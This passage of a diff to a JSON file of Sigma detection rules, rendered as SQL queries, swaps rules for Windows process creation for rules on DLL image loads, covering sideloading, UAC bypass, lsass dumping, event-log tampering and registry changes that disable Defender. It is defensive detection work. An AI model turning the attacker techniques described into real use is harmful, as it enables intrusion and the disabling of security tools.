"Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine 
LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "AppvClient", - "CCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects cmstp loading \"dll\" or \"ocx\" 
files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName 
LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": 
"proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of 
DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE 
'\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { 
- "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' 
